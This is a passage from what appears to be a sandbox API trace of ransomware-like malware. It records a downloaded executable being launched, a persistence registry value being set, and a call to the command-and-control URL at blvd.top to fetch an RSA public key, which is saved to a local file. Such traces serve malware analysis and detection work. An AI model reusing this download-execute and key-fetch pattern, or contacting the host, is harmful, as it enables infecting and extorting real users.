nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.133] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.134] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.134] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.135] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.135] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.135] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.135] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.136] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.136] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x1200) returned 1 [0179.137] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x1200, lpOverlapped=0x0) returned 1 [0179.137] CloseHandle (hObject=0x6b8) returned 1 [0179.158] InternetCloseHandle (hInternet=0xcc0030) returned 1 [0179.569] InternetCloseHandle (hInternet=0xcc0028) returned 1 [0179.570] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\5.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0179.840] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31c0250 | out: hHeap=0x260000) returned 1 [0179.840] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3235f88 | out: hHeap=0x260000) returned 1 [0179.840] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b9a70 | out: hHeap=0x260000) returned 1 [0179.840] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x318ee60 | out: hHeap=0x260000) returned 1 [0179.840] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b9668 | out: hHeap=0x260000) returned 1 [0179.840] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31ac098 | out: hHeap=0x260000) returned 1 [0179.840] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31ac0e0 | out: hHeap=0x260000) returned 1 [0179.840] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x318f218 | out: hHeap=0x260000) returned 1 [0179.841] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x318f1a8 | out: hHeap=0x260000) returned 1 [0179.841] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x318f020 | out: hHeap=0x260000) returned 1 [0179.841] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x318efb0 | out: hHeap=0x260000) returned 1 [0179.841] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2b2cb8 | out: hHeap=0x260000) returned 1 [0179.841] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31a8c48 | out: hHeap=0x260000) returned 1 [0179.841] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31c1a58 | out: hHeap=0x260000) returned 1 Thread: id = 77 os_tid = 0xa5c [0166.659] timeGetTime () returned 0x1155735 [0166.659] GetLastError () returned 0x54f [0166.659] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3bc) returned 0x31aad98 [0166.660] GetCurrentThreadId () returned 0xa5c [0166.660] SetLastError (dwErrCode=0x54f) [0166.660] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0xfc2a5e4 | out: phkResult=0xfc2a5e4*=0x5c0) returned 0x0 [0166.660] RegQueryValueExW (in: hKey=0x5c0, lpValueName="SysHelper", lpReserved=0x0, lpType=0xfc2a5d8, lpData=0xfc2a5e0, lpcbData=0xfc2a5dc*=0x4 | out: lpType=0xfc2a5d8*=0x0, lpData=0xfc2a5e0*=0x0, lpcbData=0xfc2a5dc*=0x4) returned 0x2 [0166.660] RegSetValueExW (in: hKey=0x5c0, lpValueName="SysHelper", Reserved=0x0, dwType=0x4, lpData=0xfc2a5e0*=0x1, cbData=0x4 | out: lpData=0xfc2a5e0*=0x1) returned 0x0 [0166.661] RegCloseKey (hKey=0x5c0) returned 0x0 [0166.661] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xfc2a4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0166.661] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0166.661] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x31825d8 [0166.661] AreFileApisANSI () returned 1 [0166.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfc2a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0166.661] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x7a) returned 0x2be810 [0166.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfc2a4e4, cbMultiByte=-1, lpWideCharStr=0x2be810, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0166.670] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfc2a368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.715] GetLastError () returned 0x2 [0166.715] GetLastError () returned 0x2 [0166.715] SetLastError (dwErrCode=0x2) [0166.715] GetLastError () returned 0x2 [0166.715] SetLastError (dwErrCode=0x2) [0166.715] GetLastError () returned 0x2 [0166.715] SetLastError (dwErrCode=0x2) [0166.722] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2be810 | out: hHeap=0x260000) returned 1 [0166.723] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0166.723] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x3042e8 [0166.723] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x8e) returned 0x3167210 [0166.723] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3042e8 | out: hHeap=0x260000) returned 1 [0166.723] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x318f410 [0166.723] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x840) returned 0x31bffc8 [0166.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x318f410, cbMultiByte=-1, lpWideCharStr=0x31bffc8, cchWideChar=1056 | out: lpWideCharStr="9A523923862794A7075459032DF51D89") returned 33 [0166.723] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x850) returned 0x31c0810 [0166.723] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31bffc8 | out: hHeap=0x260000) returned 1 [0166.723] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x318f410 | out: hHeap=0x260000) returned 1 [0166.723] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x8b0) returned 0x31b77d0 [0166.723] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3167210 | out: hHeap=0x260000) returned 1 [0166.723] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31c0810 | out: hHeap=0x260000) returned 1 [0166.723] lstrcpyW (in: lpString1=0xfc2af78, lpString2="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php?pid=9A523923862794A7075459032DF51D89" | out: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php?pid=9A523923862794A7075459032DF51D89") returned="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php?pid=9A523923862794A7075459032DF51D89" [0166.724] lstrcatW (in: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php?pid=9A523923862794A7075459032DF51D89", lpString2="&first=true" | out: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php?pid=9A523923862794A7075459032DF51D89&first=true") returned="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php?pid=9A523923862794A7075459032DF51D89&first=true" [0166.724] InternetOpenUrlW (hInternet=0xcc0010, lpszUrl="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php?pid=9A523923862794A7075459032DF51D89&first=true", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0167.181] InternetReadFile (in: hFile=0xcc0018, lpBuffer=0xfc2a778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xfc2a604 | out: lpBuffer=0xfc2a778*, lpdwNumberOfBytesRead=0xfc2a604*=0x230) returned 1 [0167.182] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xfc2a670 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0167.182] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0167.183] AreFileApisANSI () returned 1 [0167.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfc2a670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0167.183] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x7a) returned 0x2bf2b0 [0167.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfc2a670, cbMultiByte=-1, lpWideCharStr=0x2bf2b0, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0167.183] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0xfc2a47c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b4 [0167.184] GetFileType (hFile=0x3b4) returned 0x1 [0167.184] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2bf2b0 | out: hHeap=0x260000) returned 1 [0167.184] lstrlenA (lpString="{\"public_key\":\"-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 560 [0167.184] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1000) returned 0x31fc888 [0167.184] WriteFile (in: hFile=0x3b4, lpBuffer=0xfc29118*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0xfc28a44, lpOverlapped=0x0 | out: lpBuffer=0xfc29118*, lpNumberOfBytesWritten=0xfc28a44*=0x230, lpOverlapped=0x0) returned 1 [0167.185] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31fc888 | out: hHeap=0x260000) returned 1 [0167.186] CloseHandle (hObject=0x3b4) returned 1 [0167.191] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0167.193] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0167.193] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b77d0 | out: hHeap=0x260000) returned 1 [0167.193] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0167.193] lstrcpyA (in: lpString1=0xfc2ab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" [0167.193] lstrcpyA (in: lpString1=0xfc2a778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" [0167.193] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.193] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.194] lstrlenA (lpString="-----BEGIN PUBLIC 